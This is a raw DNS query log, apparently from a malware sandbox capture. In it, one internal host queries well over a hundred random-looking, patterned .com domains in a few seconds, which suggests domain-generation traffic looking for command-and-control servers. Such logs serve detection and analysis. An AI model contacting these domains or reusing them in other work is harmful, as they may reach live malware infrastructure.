Aug 23, 2024 18:47:44.065653086 CEST	192.168.2.4	1.1.1.1	0xb600	Standard query (0)	puvytuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.065845013 CEST	192.168.2.4	1.1.1.1	0x6dfc	Standard query (0)	gahyhob.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.198863029 CEST	192.168.2.4	1.1.1.1	0x494d	Standard query (0)	lyryvex.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.199259043 CEST	192.168.2.4	1.1.1.1	0x4561	Standard query (0)	vocyruk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.199601889 CEST	192.168.2.4	1.1.1.1	0x6ad9	Standard query (0)	qegyhig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.199825048 CEST	192.168.2.4	1.1.1.1	0x105e	Standard query (0)	purycap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.200206995 CEST	192.168.2.4	1.1.1.1	0x5d43	Standard query (0)	gacyryw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.200620890 CEST	192.168.2.4	1.1.1.1	0xad2	Standard query (0)	lygygin.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.201368093 CEST	192.168.2.4	1.1.1.1	0x7e02	Standard query (0)	vowycac.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.202778101 CEST	192.168.2.4	1.1.1.1	0x99e7	Standard query (0)	qexyryl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.203243017 CEST	192.168.2.4	1.1.1.1	0x5cd7	Standard query (0)	pufygug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.203408957 CEST	192.168.2.4	1.1.1.1	0x7301	Standard query (0)	gaqycos.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.203697920 CEST	192.168.2.4	1.1.1.1	0xeae8	Standard query (0)	lyxywer.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.205009937 CEST	192.168.2.4	1.1.1.1	0xc9c8	Standard query (0)	vofygum.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.205390930 CEST	192.168.2.4	1.1.1.1	0x668a	Standard query (0)	qeqyxov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.206001043 CEST	192.168.2.4	1.1.1.1	0x7c0b	Standard query (0)	puzywel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.206231117 CEST	192.168.2.4	1.1.1.1	0xfdcf	Standard query (0)	gadyfuh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:44.206832886 CEST	192.168.2.4	1.1.1.1	0xbe21	Standard query (0)	lymyxid.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:46.270370007 CEST	192.168.2.4	1.1.1.1	0x61b4	Standard query (0)	lygyvuj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.304891109 CEST	192.168.2.4	1.1.1.1	0xbf1f	Standard query (0)	lyxynir.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.305859089 CEST	192.168.2.4	1.1.1.1	0x5d0	Standard query (0)	vofypam.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.306653023 CEST	192.168.2.4	1.1.1.1	0xa2c	Standard query (0)	qeqykyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.310770988 CEST	192.168.2.4	1.1.1.1	0x914f	Standard query (0)	puzybil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.311697960 CEST	192.168.2.4	1.1.1.1	0x8dd7	Standard query (0)	gadypah.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.312558889 CEST	192.168.2.4	1.1.1.1	0x1c51	Standard query (0)	lymyjyd.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.312881947 CEST	192.168.2.4	1.1.1.1	0x31d	Standard query (0)	volybut.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.313781977 CEST	192.168.2.4	1.1.1.1	0x67e2	Standard query (0)	pumyjev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.313868999 CEST	192.168.2.4	1.1.1.1	0xbe72	Standard query (0)	qedytoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.314661026 CEST	192.168.2.4	1.1.1.1	0xdff3	Standard query (0)	lysytoj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.314800978 CEST	192.168.2.4	1.1.1.1	0x19de	Standard query (0)	galyvuz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.315795898 CEST	192.168.2.4	1.1.1.1	0xa183	Standard query (0)	vonyjef.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.316380024 CEST	192.168.2.4	1.1.1.1	0xebc1	Standard query (0)	qekyvup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.317368984 CEST	192.168.2.4	1.1.1.1	0x7617	Standard query (0)	pupytiq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.318161964 CEST	192.168.2.4	1.1.1.1	0xd23a	Standard query (0)	ganyhab.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.318479061 CEST	192.168.2.4	1.1.1.1	0x61ff	Standard query (0)	lykyvyx.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.319293976 CEST	192.168.2.4	1.1.1.1	0xf83a	Standard query (0)	vopyrik.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.319479942 CEST	192.168.2.4	1.1.1.1	0x92d	Standard query (0)	pujycyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.319598913 CEST	192.168.2.4	1.1.1.1	0xa669	Standard query (0)	qebyhag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.320473909 CEST	192.168.2.4	1.1.1.1	0x23df	Standard query (0)	gatyruw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.320872068 CEST	192.168.2.4	1.1.1.1	0xde1f	Standard query (0)	lyvygon.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.321798086 CEST	192.168.2.4	1.1.1.1	0xc6a3	Standard query (0)	vojycec.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.322367907 CEST	192.168.2.4	1.1.1.1	0x2d53	Standard query (0)	qetyrul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.323297977 CEST	192.168.2.4	1.1.1.1	0xc5a0	Standard query (0)	puvygog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.323925972 CEST	192.168.2.4	1.1.1.1	0x76ed	Standard query (0)	gahyces.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.324670076 CEST	192.168.2.4	1.1.1.1	0x4b5a	Standard query (0)	lyrywur.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.324985027 CEST	192.168.2.4	1.1.1.1	0xbb51	Standard query (0)	vocygim.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.326898098 CEST	192.168.2.4	1.1.1.1	0x540d	Standard query (0)	qegyxav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.327786922 CEST	192.168.2.4	1.1.1.1	0x5976	Standard query (0)	purywyl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.328895092 CEST	192.168.2.4	1.1.1.1	0xc7e2	Standard query (0)	gacyfih.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.329237938 CEST	192.168.2.4	1.1.1.1	0xceae	Standard query (0)	lygyxad.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.329687119 CEST	192.168.2.4	1.1.1.1	0x2559	Standard query (0)	qexyfuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.329725027 CEST	192.168.2.4	1.1.1.1	0x6ac1	Standard query (0)	vowyqyt.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.330248117 CEST	192.168.2.4	1.1.1.1	0x630	Standard query (0)	pufyxov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.330523968 CEST	192.168.2.4	1.1.1.1	0x4dd4	Standard query (0)	gaqyqez.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.330625057 CEST	192.168.2.4	1.1.1.1	0x45c0	Standard query (0)	lyxyfuj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.331185102 CEST	192.168.2.4	1.1.1.1	0xc924	Standard query (0)	vofyzof.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.331590891 CEST	192.168.2.4	1.1.1.1	0x2beb	Standard query (0)	qeqyqep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.331671953 CEST	192.168.2.4	1.1.1.1	0x935	Standard query (0)	puzyduq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.332353115 CEST	192.168.2.4	1.1.1.1	0xf90f	Standard query (0)	gadyzib.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.332806110 CEST	192.168.2.4	1.1.1.1	0x99dc	Standard query (0)	lymymax.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.332865953 CEST	192.168.2.4	1.1.1.1	0xaf6a	Standard query (0)	volydyk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.333395958 CEST	192.168.2.4	1.1.1.1	0x7105	Standard query (0)	qedylig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.333802938 CEST	192.168.2.4	1.1.1.1	0xe279	Standard query (0)	galydyw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.333952904 CEST	192.168.2.4	1.1.1.1	0x723e	Standard query (0)	pumymap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.334290981 CEST	192.168.2.4	1.1.1.1	0x9680	Standard query (0)	lysylun.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.334804058 CEST	192.168.2.4	1.1.1.1	0xc276	Standard query (0)	vonymoc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.334922075 CEST	192.168.2.4	1.1.1.1	0xc58c	Standard query (0)	qekysel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.335546970 CEST	192.168.2.4	1.1.1.1	0x352c	Standard query (0)	pupylug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.335745096 CEST	192.168.2.4	1.1.1.1	0x4371	Standard query (0)	ganynos.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.336077929 CEST	192.168.2.4	1.1.1.1	0xcb9c	Standard query (0)	lykyser.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.336649895 CEST	192.168.2.4	1.1.1.1	0x9521	Standard query (0)	vopykum.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.337029934 CEST	192.168.2.4	1.1.1.1	0xd36d	Standard query (0)	qebyniv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.337173939 CEST	192.168.2.4	1.1.1.1	0x35ba	Standard query (0)	pujypal.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.337801933 CEST	192.168.2.4	1.1.1.1	0x8295	Standard query (0)	gatykyh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.337858915 CEST	192.168.2.4	1.1.1.1	0xa81b	Standard query (0)	lyvynid.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.338368893 CEST	192.168.2.4	1.1.1.1	0x1d0b	Standard query (0)	vojypat.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.338383913 CEST	192.168.2.4	1.1.1.1	0x32b2	Standard query (0)	qetykyq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.339353085 CEST	192.168.2.4	1.1.1.1	0xceaf	Standard query (0)	puvybuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.339840889 CEST	192.168.2.4	1.1.1.1	0xed1c	Standard query (0)	gahypoz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.340034962 CEST	192.168.2.4	1.1.1.1	0xe346	Standard query (0)	lyryjej.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.340312004 CEST	192.168.2.4	1.1.1.1	0x9311	Standard query (0)	vocybuf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.340643883 CEST	192.168.2.4	1.1.1.1	0x39ef	Standard query (0)	qegytop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:47.341439009 CEST	192.168.2.4	1.1.1.1	0x8c5e	Standard query (0)	puryjeq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.681747913 CEST	192.168.2.4	1.1.1.1	0xb51c	Standard query (0)	gacyvub.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.682568073 CEST	192.168.2.4	1.1.1.1	0x2721	Standard query (0)	lygytix.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.683495998 CEST	192.168.2.4	1.1.1.1	0x8d56	Standard query (0)	vowyjak.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.684355974 CEST	192.168.2.4	1.1.1.1	0x204f	Standard query (0)	qexyvyg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.685098886 CEST	192.168.2.4	1.1.1.1	0x6315	Standard query (0)	pufytip.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.685977936 CEST	192.168.2.4	1.1.1.1	0xc6f9	Standard query (0)	gaqyhaw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.686530113 CEST	192.168.2.4	1.1.1.1	0xbf65	Standard query (0)	lyxyvyn.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.687277079 CEST	192.168.2.4	1.1.1.1	0xd348	Standard query (0)	vofyruc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.688019991 CEST	192.168.2.4	1.1.1.1	0x8ec5	Standard query (0)	qeqyhol.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.688704014 CEST	192.168.2.4	1.1.1.1	0xdb1e	Standard query (0)	puzyceg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.689310074 CEST	192.168.2.4	1.1.1.1	0xef58	Standard query (0)	gadyrus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.689846039 CEST	192.168.2.4	1.1.1.1	0xa753	Standard query (0)	lymygor.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.690622091 CEST	192.168.2.4	1.1.1.1	0x7325	Standard query (0)	volycem.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.691386938 CEST	192.168.2.4	1.1.1.1	0x148a	Standard query (0)	qedyruv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.691927910 CEST	192.168.2.4	1.1.1.1	0x60e2	Standard query (0)	pumygil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.692579031 CEST	192.168.2.4	1.1.1.1	0x8e0c	Standard query (0)	galycah.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.693273067 CEST	192.168.2.4	1.1.1.1	0xdd99	Standard query (0)	lysywyd.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.693808079 CEST	192.168.2.4	1.1.1.1	0xdd6e	Standard query (0)	vonygit.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.694251060 CEST	192.168.2.4	1.1.1.1	0x81	Standard query (0)	qekyxaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.694616079 CEST	192.168.2.4	1.1.1.1	0xf8c	Standard query (0)	pupywyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.694917917 CEST	192.168.2.4	1.1.1.1	0xd87b	Standard query (0)	ganyfuz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.695343018 CEST	192.168.2.4	1.1.1.1	0xcb0c	Standard query (0)	lykyxoj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.695838928 CEST	192.168.2.4	1.1.1.1	0xa08e	Standard query (0)	vopyqef.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.696180105 CEST	192.168.2.4	1.1.1.1	0x35e5	Standard query (0)	qebyfup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.696855068 CEST	192.168.2.4	1.1.1.1	0x287c	Standard query (0)	pujyxoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.697604895 CEST	192.168.2.4	1.1.1.1	0x3c8a	Standard query (0)	gatyqeb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.698508978 CEST	192.168.2.4	1.1.1.1	0x96fe	Standard query (0)	lyvyfux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.699282885 CEST	192.168.2.4	1.1.1.1	0xb120	Standard query (0)	vojyzik.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.699897051 CEST	192.168.2.4	1.1.1.1	0xce61	Standard query (0)	qetyqag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.701801062 CEST	192.168.2.4	1.1.1.1	0xb44b	Standard query (0)	puvydyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.702805042 CEST	192.168.2.4	1.1.1.1	0x6842	Standard query (0)	gahyziw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.703695059 CEST	192.168.2.4	1.1.1.1	0x7f22	Standard query (0)	lyryman.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.704391003 CEST	192.168.2.4	1.1.1.1	0x7857	Standard query (0)	vocydyc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.704401970 CEST	192.168.2.4	1.1.1.1	0xbe85	Standard query (0)	qegylul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.705070972 CEST	192.168.2.4	1.1.1.1	0x3833	Standard query (0)	gacydes.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.705096006 CEST	192.168.2.4	1.1.1.1	0xd299	Standard query (0)	purymog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.705296993 CEST	192.168.2.4	1.1.1.1	0x3595	Standard query (0)	lygylur.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.705893040 CEST	192.168.2.4	1.1.1.1	0x6013	Standard query (0)	qexysev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.705916882 CEST	192.168.2.4	1.1.1.1	0xd504	Standard query (0)	vowymom.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.706132889 CEST	192.168.2.4	1.1.1.1	0xaba0	Standard query (0)	pufylul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.706653118 CEST	192.168.2.4	1.1.1.1	0xb73	Standard query (0)	gaqynih.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.706705093 CEST	192.168.2.4	1.1.1.1	0x79ce	Standard query (0)	vofykyt.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.706845999 CEST	192.168.2.4	1.1.1.1	0x41dd	Standard query (0)	lyxysad.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.707401991 CEST	192.168.2.4	1.1.1.1	0xefa4	Standard query (0)	qeqyniq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.707562923 CEST	192.168.2.4	1.1.1.1	0xd04e	Standard query (0)	puzypav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.707705021 CEST	192.168.2.4	1.1.1.1	0x25e4	Standard query (0)	gadykyz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.708287001 CEST	192.168.2.4	1.1.1.1	0xf6ed	Standard query (0)	lymynuj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.708472967 CEST	192.168.2.4	1.1.1.1	0xf5c8	Standard query (0)	volypof.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.708842993 CEST	192.168.2.4	1.1.1.1	0x1bac	Standard query (0)	pumybuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.708870888 CEST	192.168.2.4	1.1.1.1	0x58e0	Standard query (0)	galypob.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.709515095 CEST	192.168.2.4	1.1.1.1	0xb3e0	Standard query (0)	qekytig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.709573030 CEST	192.168.2.4	1.1.1.1	0x3206	Standard query (0)	lysyjex.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.709748030 CEST	192.168.2.4	1.1.1.1	0xeae8	Standard query (0)	vonybuk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.710057020 CEST	192.168.2.4	1.1.1.1	0xc3a4	Standard query (0)	pupyjap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.710475922 CEST	192.168.2.4	1.1.1.1	0x5568	Standard query (0)	lykytin.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.712285995 CEST	192.168.2.4	1.1.1.1	0x2a94	Standard query (0)	ganyvyw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.712502956 CEST	192.168.2.4	1.1.1.1	0xb953	Standard query (0)	qebyvyl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.712768078 CEST	192.168.2.4	1.1.1.1	0xd534	Standard query (0)	pujytug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.712949991 CEST	192.168.2.4	1.1.1.1	0x9d66	Standard query (0)	gatyhos.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.713109970 CEST	192.168.2.4	1.1.1.1	0x9936	Standard query (0)	lyvyver.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.713279963 CEST	192.168.2.4	1.1.1.1	0xe973	Standard query (0)	vojyrum.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.713457108 CEST	192.168.2.4	1.1.1.1	0xba0b	Standard query (0)	qetyhov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.713886976 CEST	192.168.2.4	1.1.1.1	0x9bbb	Standard query (0)	qedykep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.714263916 CEST	192.168.2.4	1.1.1.1	0x3762	Standard query (0)	vopyjac.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.762491941 CEST	192.168.2.4	1.1.1.1	0x5628	Standard query (0)	puvycel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.763292074 CEST	192.168.2.4	1.1.1.1	0xf53f	Standard query (0)	gahyruh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.764008999 CEST	192.168.2.4	1.1.1.1	0xaac2	Standard query (0)	lyrygid.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.764359951 CEST	192.168.2.4	1.1.1.1	0xb92e	Standard query (0)	vocycat.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.764621019 CEST	192.168.2.4	1.1.1.1	0x2602	Standard query (0)	purygiv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.765255928 CEST	192.168.2.4	1.1.1.1	0xa28	Standard query (0)	vowyguf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.765280962 CEST	192.168.2.4	1.1.1.1	0xfa69	Standard query (0)	lygywyj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.765561104 CEST	192.168.2.4	1.1.1.1	0xd995	Standard query (0)	qexyxop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.765862942 CEST	192.168.2.4	1.1.1.1	0x9139	Standard query (0)	gacycaz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.766154051 CEST	192.168.2.4	1.1.1.1	0x9ee3	Standard query (0)	pufyweq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.766424894 CEST	192.168.2.4	1.1.1.1	0x1129	Standard query (0)	gaqyfub.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.767010927 CEST	192.168.2.4	1.1.1.1	0x7ed7	Standard query (0)	vofyqek.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.767010927 CEST	192.168.2.4	1.1.1.1	0x99b5	Standard query (0)	lyxyxox.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.767755985 CEST	192.168.2.4	1.1.1.1	0xc48a	Standard query (0)	qeqyfug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.767755985 CEST	192.168.2.4	1.1.1.1	0x5ccb	Standard query (0)	puzyxip.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.768424988 CEST	192.168.2.4	1.1.1.1	0xac58	Standard query (0)	volyzic.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.768474102 CEST	192.168.2.4	1.1.1.1	0xc748	Standard query (0)	gadyqaw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.768578053 CEST	192.168.2.4	1.1.1.1	0x9c1f	Standard query (0)	lymyfyn.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.769190073 CEST	192.168.2.4	1.1.1.1	0x4894	Standard query (0)	qedyqal.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.769206047 CEST	192.168.2.4	1.1.1.1	0x9d62	Standard query (0)	galyzus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.769382954 CEST	192.168.2.4	1.1.1.1	0x7e78	Standard query (0)	pumydyg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.769893885 CEST	192.168.2.4	1.1.1.1	0x263b	Standard query (0)	lysymor.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.769927979 CEST	192.168.2.4	1.1.1.1	0x521d	Standard query (0)	qekyluv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.770108938 CEST	192.168.2.4	1.1.1.1	0x843b	Standard query (0)	vonydem.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.770716906 CEST	192.168.2.4	1.1.1.1	0xbbb9	Standard query (0)	pupymol.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.770773888 CEST	192.168.2.4	1.1.1.1	0x48cc	Standard query (0)	ganydeh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.771053076 CEST	192.168.2.4	1.1.1.1	0x947	Standard query (0)	lykylud.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.771543026 CEST	192.168.2.4	1.1.1.1	0xc098	Standard query (0)	vopymit.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.771568060 CEST	192.168.2.4	1.1.1.1	0xc6e1	Standard query (0)	qebysaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.771784067 CEST	192.168.2.4	1.1.1.1	0xb0a7	Standard query (0)	pujylyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.772506952 CEST	192.168.2.4	1.1.1.1	0xbf95	Standard query (0)	lyvysaj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.772785902 CEST	192.168.2.4	1.1.1.1	0xd3b3	Standard query (0)	gatyniz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.772963047 CEST	192.168.2.4	1.1.1.1	0x59f6	Standard query (0)	qetynup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.774626970 CEST	192.168.2.4	1.1.1.1	0x5ec3	Standard query (0)	puvypoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.775896072 CEST	192.168.2.4	1.1.1.1	0x64c2	Standard query (0)	qegyryq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.776094913 CEST	192.168.2.4	1.1.1.1	0xf044	Standard query (0)	gahykeb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.776237965 CEST	192.168.2.4	1.1.1.1	0x505b	Standard query (0)	lyrynux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.776443005 CEST	192.168.2.4	1.1.1.1	0x5256	Standard query (0)	vocypok.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.776616096 CEST	192.168.2.4	1.1.1.1	0x9c6f	Standard query (0)	qegykeg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.776755095 CEST	192.168.2.4	1.1.1.1	0x4128	Standard query (0)	purybup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:48.776902914 CEST	192.168.2.4	1.1.1.1	0x2a9a	Standard query (0)	gacypiw.com	A (IP address)	IN (0x0001)	false
